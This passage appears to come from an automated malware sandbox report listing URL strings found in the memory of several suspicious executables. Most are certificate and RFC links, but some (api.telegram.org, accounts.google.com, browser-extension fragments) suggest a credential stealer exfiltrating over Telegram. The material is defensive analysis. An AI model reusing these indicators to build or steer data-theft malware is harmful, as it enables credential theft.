Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269785211839.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40633000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800064672.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269791889062.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784743217.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782316897.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781968848.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: LoaderClient.exe, 0000002E.00000003.269785211839.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40633000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800064672.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269791889062.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784743217.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782316897.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781968848.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783180111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: LoaderClient.exe, 0000002E.00000003.269785211839.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40633000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800064672.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269791889062.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784743217.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782316897.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781968848.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40633000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: LoaderClient.exe, 0000002E.00000003.269785211839.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800064672.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269791889062.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784743217.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782316897.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781968848.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783180111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digif
Source: b1dc05533c.exe, 00000014.00000003.269582670864.0000000003BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.
Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: LoaderClient.exe, 0000002F.00000002.269881633471.00000178EAAA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: LoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883225373.00000178EAE47000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269868352131.00000178EAE3C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
Source: LoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269865238563.00000178EA79B000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269856730125.00000178EA746000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269857419090.00000178EA796000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269862666473.00000178EA79B000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269872655017.00000178EA79B000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852243411.00000178EA731000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269882618307.00000178EAD5A000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269862182845.00000178EAD58000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883362038.00000178EAE67000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269857780538.00000178EAD32000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269867565150.00000178EAD58000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852023135.00000178EAD20000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869753931.00000178EAE5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: C1J7SVw.exe, 00000007.00000000.269460124832.0000000000423000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: LoaderClient.exe, 0000002F.00000003.269851106200.00000178EAEA7000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269866340442.00000178EAEAB000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883610008.00000178EAF0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: LoaderClient.exe, 0000002E.00000003.269803969976.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/
Source: LoaderClient.exe, 0000002E.00000003.269805355749.0000023A40637000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000002.269903631046.0000023A40637000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269803969976.0000023A40636000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269803969976.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269851671317.00000178EA352000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269856585205.00000178EA3B8000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269875318381.00000178EAE7C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269853538063.00000178EA3B4000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269871977181.00000178EAE78000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883457246.00000178EAE80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883362038.00000178EAE67000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869753931.00000178EAE5E000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269868015957.00000178EAEA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: LoaderClient.exe, 0000002E.00000003.269785211839.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40633000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800064672.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269791889062.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784743217.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782316897.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781968848.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: AzVRM7c.exe, 00000029.00000002.269641987403.00000247AFC90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coO
Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269641953537.0000022434300000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269622533253.000002243266F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635692000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADF59000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8C8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269673713462.000001B3EE923000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: LoaderClient.exe, 0000002F.00000003.269851671317.00000178EA352000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: LoaderClient.exe, 0000002F.00000003.269851106200.00000178EAEA7000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269866340442.00000178EAEAB000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883610008.00000178EAF0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: LoaderClient.exe, 0000002F.00000003.269851106200.00000178EAEA7000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269866340442.00000178EAEAB000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883610008.00000178EAF0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575735102.000002243262A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576784135.0000022432690000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576483207.00000224326BE000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593953212.00000256355F5000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595629729.0000025635684000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593045061.0000025635606000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594381110.00000256355F8000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619997889.00000247ADF05000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com
Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com1
Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com4
Source: dwVrTdy.exe, 00000028.00000003.269593045061.0000025635606000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com8
Source: dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576784135.0000022432690000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com9
Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.comA:
Source: t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269673713462.000001B3EE955000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667320015.000001B3EE954000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE95F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.coma
Source: dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.comdos
Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666926038.000001B3EE8D9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666253189.000001B3EE8D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.comins.js
Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.comlhkhi
Source: dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.commgoekp#
Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.commhnfd
Source: dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.commhnfdidos
Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666253189.000001B3EE8D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.commieda
Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: dwVrTdy.exe, 00000026.00000003.269573791610.0000022432625000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269591113981.00000256355FF000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592431240.000002563560A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592469825.000002563560C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: dwVrTdy.exe, 00000026.00000003.269573791610.0000022432625000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com36975082
Source: dwVrTdy.exe, 00000026.00000003.269573791610.0000022432625000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269591113981.00000256355FF000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592431240.000002563560A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592469825.000002563560C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: dwVrTdy.exe, 00000026.00000002.269641953537.000002243431F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269640823894.0000022432659000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269666025995.00000256362A6000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADF08000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641987403.00000247AFC90000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F076F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/
Source: dwVrTdy.exe, 00000026.00000002.269641953537.000002243431F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/$
